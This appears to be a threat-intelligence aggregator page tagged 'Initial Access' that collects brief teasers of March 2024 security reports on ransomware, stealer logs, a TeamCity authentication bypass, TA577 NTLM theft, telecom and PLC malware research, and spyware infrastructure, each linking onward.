Tag: INITIAL ACCESS

The proliferation of programmable logic controllers (PLCs) with embedded Web servers in them has given attackers a way to launch potentially catastrophic, remote attacks against operational technology (OT) for industrial control systems (ICS) in critical infrastructure sectors.

To highlight the threat, a team of researchers from the Georgia Institute of Technology has developed malware that an adversary could use to remotely access an embedded Web server within a PLC, and attack the underlying physical system.…

Read More

Mar 05, 2024NewsroomMalware / Artificial Intelligence

More than 225,000 logs containing compromised OpenAI ChatGPT credentials were made available for sale on underground markets between January and October 2023, new findings from Group-IB show.

These credentials were found within information stealer logs associated with LummaC2, Raccoon, and RedLine stealer malware.…

Read More
Key TakeawaysThe Kroll Cyber Threat Intelligence (CTI) team discovered new malware resembling the VBScript based BABYSHARK malware that we’ve called TODDLERSHARK.The malware was used in post-compromise activity following exploitation of a ScreenConnect application.BABYSHARK has been associated, by several sources, with a threat actor Kroll tracks as KTA082 (Kimsuky).The…
Read More

Published On : 2024-03-05

EXECUTIVE SUMMARY

At CYFIRMA, our commitment is to provide timely insights into prevalent threats and malicious tactics affecting both organizations and individuals. Our research team recently identified a malicious .docx file linked to the stego-campaign, revealing a sophisticated cyber threat.

This campaign utilizes template injection in a Microsoft Office document to bypass traditional email security measures.…

Read More

The hacking group known as TA577 has recently shifted tactics by using phishing emails to steal NT LAN Manager (NTLM) authentication hashes to perform account hijacks.

TA577 is considered an initial access broker (IAB), previously associated with Qbot and linked to Black Basta ransomware infections.

Email security firm Proofpoint reports today that although it has seen TA577 showing a preference for deploying Pikabot recently, two recent attack waves demonstrate a different tactic.…

Read More

Last updated at Tue, 05 Mar 2024 22:21:55 GMT

Overview

In February 2024, Rapid7’s vulnerability research team identified two new vulnerabilities affecting JetBrains TeamCity CI/CD server:

CVE-2024-27198 is an authentication bypass vulnerability in the web component of TeamCity that arises from an alternative path issue (CWE-288) and has a CVSS base score of 9.8 (Critical).…
Read More

U.S. cybersecurity and intelligence agencies have warned of Phobos ransomware attacks targeting government and critical infrastructure entities, outlining the various tactics and techniques the threat actors have adopted to deploy the file-encrypting malware.

“Structured as a ransomware as a service (RaaS) model, Phobos ransomware actors have targeted entities including municipal and county governments, emergency services, education, public healthcare, and critical infrastructure to successfully ransom several million in U.S.…

Read More

March 04, 2024

Tommy Madjar, Kelsey Merriman, Selena Larson and the Proofpoint Threat Research Team 

What happened 

Proofpoint identified notable cybercriminal threat actor TA577 using a new attack chain to demonstrate an uncommonly observed objective: stealing NT LAN Manager (NTLM) authentication information. This activity can be used for sensitive information gathering purposes and to enable follow-on activity. …

Read More

Security researcher HaxRob discovered a previously unknown Linux backdoor named GTPDOOR, designed for covert operations within mobile carrier networks.

The threat actors behind GTPDOOR are believed to target systems adjacent to the GPRS roaming eXchange (GRX), such as SGSN, GGSN, and P-GW, which can provide the attackers direct access to a telecom’s core network.…

Read More
Key TakeawaysIn February 2023, we detected an intrusion that was initiated by a user downloading and executing a file from a SEO-poisoned search result, leading to a Gootloader infection.Around nine hours after the initial infection, the Gootloader malware facilitated the deployment of a Cobalt Strike beacon payload directly into the host’s registry, and then executed it in memory.…
Read More

New research from Recorded Future’s Insikt Group examines newly discovered infrastructure related to the operators of Predator, a mercenary mobile spyware. This infrastructure is believed to be in use in at least eleven countries, including Angola, Armenia, Botswana, Egypt, Indonesia, Kazakhstan, Mongolia, Oman, the Philippines, Saudi Arabia, and Trinidad and Tobago.…

Read More

In October 2023, the network of a Darktrace customer was targeted with ALPHV, or BlackCat, ransomware. An investigation into the attack revealed the usage of methods associated with the Nitrogen campaign, such as ‘malvertising’ and the distribution of malicious Python packages.

As-a-Service malware trending

Throughout the course of 2023, “as-a-Service” strains of malware remained the most consistently observed threat type to affect Darktrace customers, mirroring their overall prominence across the cyber threat landscape.…

Read More
SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware.…

Read More